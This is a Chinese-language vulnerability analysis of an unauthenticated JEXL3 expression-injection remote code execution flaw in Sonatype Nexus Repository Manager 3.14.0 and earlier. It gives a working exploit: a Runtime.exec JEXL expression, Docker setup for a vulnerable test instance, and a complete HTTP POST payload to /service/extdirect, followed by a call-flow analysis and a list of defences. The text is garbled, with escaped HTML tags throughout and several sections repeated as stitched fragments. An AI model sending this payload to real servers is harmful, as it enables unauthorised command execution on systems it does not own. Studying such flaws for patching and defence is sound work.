Nexus Repository Manager 3 JEXL3表达式注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Sonatype Nexus Repository Manager 3存在一个JEXL3表达式注入漏洞，允许攻击者在未授权情况下通过发送精心构造的恶意JSON数据实现远程代码执行(RCE)。<\/p>

影响版本<\/h3>

受影响版本：Nexus Repository Manager OSS\/Pro 3.x - 3.14.0<\/li>

修复版本：Nexus Repository Manager OSS\/Pro 3.15.0<\/li> <\/ul>

JEXL表达式基础<\/h2>
JEXL(Java EXpression Language)是一种简单的表达式语言，基于JSTL表达式语言扩展实现。<\/p>

JEXL3基本使用示例<\/h3>

添加Maven依赖：<\/li> <\/ol>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.apache.commons<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-jexl3<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.0<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>
基本使用步骤：<\/li>
<\/ol>
\/\/ 创建JexlEngine
<\/span><\/span><\/span><\/span>JexlEngine jexl =<\/span> new<\/span> JexlBuilder().<\/span>create<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建表达式
<\/span><\/span><\/span><\/span>String jexlExp =<\/span> "car.engine.checkStatus()"<\/span>;<\/span>
<\/span><\/span>Expression e =<\/span> jexl.<\/span>createExpression<\/span>(<\/span>jexlExp);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建上下文并添加数据
<\/span><\/span><\/span><\/span>JexlContext jc =<\/span> new<\/span> MapContext();<\/span>
<\/span><\/span>jc.<\/span>set<\/span>(<\/span>"car"<\/span>,<\/span> car);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 执行表达式
<\/span><\/span><\/span><\/span>Object o =<\/span> e.<\/span>evaluate<\/span>(<\/span>jc);<\/span>
<\/span><\/span><\/code><\/pre>
完整示例代码：<\/li>
<\/ol>
public<\/span> class<\/span> TestCase<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        JexlEngine jexl =<\/span> new<\/span> JexlBuilder().<\/span>create<\/span>();<\/span>
<\/span><\/span>        JexlContext jc =<\/span> new<\/span> MapContext();<\/span>
<\/span><\/span>        Foo foo =<\/span> new<\/span> Foo();<\/span>
<\/span><\/span>        Integer number =<\/span> new<\/span> Integer(<\/span>9999<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        jc.<\/span>set<\/span>(<\/span>"foo"<\/span>,<\/span> foo);<\/span>
<\/span><\/span>        jc.<\/span>set<\/span>(<\/span>"number"<\/span>,<\/span> number);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 调用无参数方法
<\/span><\/span><\/span><\/span>        JexlExpression e =<\/span> jexl.<\/span>createExpression<\/span>(<\/span>"foo.getFoo()"<\/span>);<\/span>
<\/span><\/span>        Object o =<\/span> e.<\/span>evaluate<\/span>(<\/span>jc);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"value returned by the method getFoo() is : "<\/span> +<\/span> o);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 调用带参数方法
<\/span><\/span><\/span><\/span>        e =<\/span> jexl.<\/span>createExpression<\/span>(<\/span>"foo.convert(1)"<\/span>);<\/span>
<\/span><\/span>        o =<\/span> e.<\/span>evaluate<\/span>(<\/span>jc);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"value of "<\/span> +<\/span> e.<\/span>getParsedText<\/span>()<\/span> +<\/span> " is : "<\/span> +<\/span> o);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 使用上下文变量
<\/span><\/span><\/span><\/span>        e =<\/span> jexl.<\/span>createExpression<\/span>(<\/span>"foo.convert(number)"<\/span>);<\/span>
<\/span><\/span>        o =<\/span> e.<\/span>evaluate<\/span>(<\/span>jc);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"value of "<\/span> +<\/span> e.<\/span>getParsedText<\/span>()<\/span> +<\/span> " is : "<\/span> +<\/span> o);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 调用get方法
<\/span><\/span><\/span><\/span>        e =<\/span> jexl.<\/span>createExpression<\/span>(<\/span>"foo.bar"<\/span>);<\/span>
<\/span><\/span>        o =<\/span> e.<\/span>evaluate<\/span>(<\/span>jc);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"value returned for the property 'bar' is : "<\/span> +<\/span> o);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> class<\/span> Foo<\/span> {<\/span>
<\/span><\/span>        public<\/span> String getFoo<\/span>()<\/span> {<\/span> return<\/span> "This is from getFoo()"<\/span>;<\/span> }<\/span>
<\/span><\/span>        public<\/span> String get<\/span>(<\/span>String arg)<\/span> {<\/span> return<\/span> "This is the property "<\/span> +<\/span> arg;<\/span> }<\/span>
<\/span><\/span>        public<\/span> String convert<\/span>(<\/span>long<\/span> i)<\/span> {<\/span> return<\/span> "The value is : "<\/span> +<\/span> i;<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用原理<\/h2>
通过构造恶意的JEXL表达式，可以实现任意命令执行：<\/p>
String Exp =<\/span> "233.class.forName('java.lang.Runtime').getRuntime().exec('touch \/tmp\/rai4over')"<\/span>;<\/span>
<\/span><\/span>JexlEngine engine =<\/span> new<\/span> JexlBuilder().<\/span>create<\/span>();<\/span>
<\/span><\/span>JexlExpression Expression =<\/span> engine.<\/span>createExpression<\/span>(<\/span>Exp);<\/span>
<\/span><\/span>JexlContext Context =<\/span> new<\/span> MapContext();<\/span>
<\/span><\/span>Object rs =<\/span> Expression.<\/span>evaluate<\/span>(<\/span>Context);<\/span>
<\/span><\/span><\/code><\/pre>JEXL3解析执行流程<\/h3>

创建JexlEngine对象：new JexlBuilder().create()<\/code><\/li>
创建表达式对象：engine.createExpression(Exp)<\/code><\/li>
解析表达式：

调用Engine.parse()<\/code>方法<\/li>
使用Parser.parse()<\/code>进行语法解析<\/li>
构建AST(抽象语法树)节点<\/li>
<\/ul>
<\/li>
执行表达式：

创建上下文环境<\/li>
通过Interpreter.interpret()<\/code>解析执行AST节点<\/li>
最终通过反射机制执行命令<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现环境搭建<\/h2>

拉取Nexus3 Docker镜像：<\/li>
<\/ol>
docker pull sonatype\/nexus3:3.14.0
<\/span><\/span><\/code><\/pre>
运行容器（带调试参数）：<\/li>
<\/ol>
docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus \
<\/span><\/span><\/span><\/span>-v \/path\/to\/nexus-data:\/nexus-data \
<\/span><\/span><\/span><\/span>-e INSTALL4J_ADD_VM_PARAMS=<\/span>"-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g \
<\/span><\/span><\/span>-Djava.util.prefs.userRoot=\/nexus-data \
<\/span><\/span><\/span>-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050"<\/span> \
<\/span><\/span><\/span><\/span>sonatype\/nexus3:3.14.0
<\/span><\/span><\/code><\/pre>
下载源码并切换到对应分支：<\/li>
<\/ol>
git clone https:\/\/github.com\/sonatype\/nexus-public.git
<\/span><\/span>git checkout -b release-3.14.0-04 remotes\/origin\/release-3.14.0-04
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
漏洞请求路径<\/h3>
\/service\/extdirect<\/code><\/p>
漏洞利用Payload<\/h3>
POST<\/span> \/service\/extdirect HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8081<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>X-Requested-With:<\/span> XMLHttpRequest<\/span>
<\/span><\/span>Content-Length:<\/span> 825<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "action"<\/span>: "coreui_Component"<\/span>,
<\/span><\/span>    "method"<\/span>: "previewAssets"<\/span>,
<\/span><\/span>    "data"<\/span>: [{
<\/span><\/span>        "page"<\/span>: 1<\/span>,
<\/span><\/span>        "start"<\/span>: 0<\/span>,
<\/span><\/span>        "limit"<\/span>: 50<\/span>,
<\/span><\/span>        "sort"<\/span>: [{
<\/span><\/span>            "property"<\/span>: "name"<\/span>,
<\/span><\/span>            "direction"<\/span>: "ASC"<\/span>
<\/span><\/span>        }],
<\/span><\/span>        "filter"<\/span>: [{
<\/span><\/span>            "property"<\/span>: "repositoryName"<\/span>,
<\/span><\/span>            "value"<\/span>: "*"<\/span>
<\/span><\/span>        }, {
<\/span><\/span>            "property"<\/span>: "expression"<\/span>,
<\/span><\/span>            "value"<\/span>: "233.class.forName('java.lang.Runtime').getRuntime().exec('touch \/tmp\/rai4over')"<\/span>
<\/span><\/span>        }, {
<\/span><\/span>            "property"<\/span>: "type"<\/span>,
<\/span><\/span>            "value"<\/span>: "jexl"<\/span>
<\/span><\/span>        }]
<\/span><\/span>    }],
<\/span><\/span>    "type"<\/span>: "rpc"<\/span>,
<\/span><\/span>    "tid"<\/span>: 8<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞位置<\/h3>
plugins\/nexus-coreui-plugin\/src\/main\/java\/org\/sonatype\/nexus\/coreui\/ComponentComponent.groovy<\/code>接口未进行权限验证<\/p>
调用流程<\/h3>

请求首先经过DelegatingFilter<\/code>处理<\/li>
进入DirectJNgineServlet<\/code>的doPost<\/code>方法<\/li>
通过JsonRequestProcessor<\/code>处理JSON请求<\/li>
最终执行到存在漏洞的previewAssets<\/code>方法<\/li>
<\/ol>
关键点<\/h3>

接口未授权访问<\/li>
直接使用用户输入的表达式内容进行JEXL解析<\/li>
通过反射机制执行任意Java代码<\/li>
<\/ul>
防御措施<\/h2>

升级到修复版本3.15.0或更高<\/li>
对用户输入进行严格过滤和验证<\/li>
限制JEXL表达式的执行权限<\/li>
实施最小权限原则运行服务<\/li>
<\/ol>

Nexus Repository Manager 3 JEXL3表达式注入漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Sonatype Nexus Repository Manager 3存在一个JEXL3表达式注入漏洞，允许攻击者在未授权情况下通过发送精心构造的恶意JSON数据实现远程代码执行(RCE)。<\/p>

JEXL表达式基础<\/h2>
JEXL(Java EXpression Language)是一种简单的表达式语言，基于JSTL表达式语言扩展实现。<\/p>

漏洞利用<\/h2>

漏洞请求路径<\/h3>
`\/service\/extdirect<\/code><\/p>`

漏洞分析<\/h2>

漏洞位置<\/h3>
`plugins\/nexus-coreui-plugin\/src\/main\/java\/org\/sonatype\/nexus\/coreui\/ComponentComponent.groovy<\/code>接口未进行权限验证<\/p>`

防御措施<\/h2>

升级到修复版本3.15.0或更高<\/li>
对用户输入进行严格过滤和验证<\/li>
限制JEXL表达式的执行权限<\/li>
实施最小权限原则运行服务<\/li> <\/ol>

Nexus Repository Manager 3 JEXL3表达式注入漏洞分析与利用<\/h1>

漏洞概述<\/h2> Sonatype Nexus Repository Manager 3存在一个JEXL3表达式注入漏洞，允许攻击者在未授权情况下通过发送精心构造的恶意JSON数据实现远程代码执行(RCE)。<\/p>

JEXL表达式基础<\/h2> JEXL(Java EXpression Language)是一种简单的表达式语言，基于JSTL表达式语言扩展实现。<\/p>

漏洞利用<\/h2>

漏洞请求路径<\/h3> \/service\/extdirect<\/code><\/p>

漏洞分析<\/h2>

漏洞位置<\/h3> plugins\/nexus-coreui-plugin\/src\/main\/java\/org\/sonatype\/nexus\/coreui\/ComponentComponent.groovy<\/code>接口未进行权限验证<\/p>

防御措施<\/h2> 升级到修复版本3.15.0或更高<\/li> 对用户输入进行严格过滤和验证<\/li> 限制JEXL表达式的执行权限<\/li> 实施最小权限原则运行服务<\/li> <\/ol>

漏洞概述<\/h2>
Sonatype Nexus Repository Manager 3存在一个JEXL3表达式注入漏洞，允许攻击者在未授权情况下通过发送精心构造的恶意JSON数据实现远程代码执行(RCE)。<\/p>

JEXL表达式基础<\/h2>
JEXL(Java EXpression Language)是一种简单的表达式语言，基于JSTL表达式语言扩展实现。<\/p>

漏洞请求路径<\/h3>
`\/service\/extdirect<\/code><\/p>`

漏洞位置<\/h3>
`plugins\/nexus-coreui-plugin\/src\/main\/java\/org\/sonatype\/nexus\/coreui\/ComponentComponent.groovy<\/code>接口未进行权限验证<\/p>`

防御措施<\/h2>

升级到修复版本3.15.0或更高<\/li>
对用户输入进行严格过滤和验证<\/li>
限制JEXL表达式的执行权限<\/li>
实施最小权限原则运行服务<\/li> <\/ol>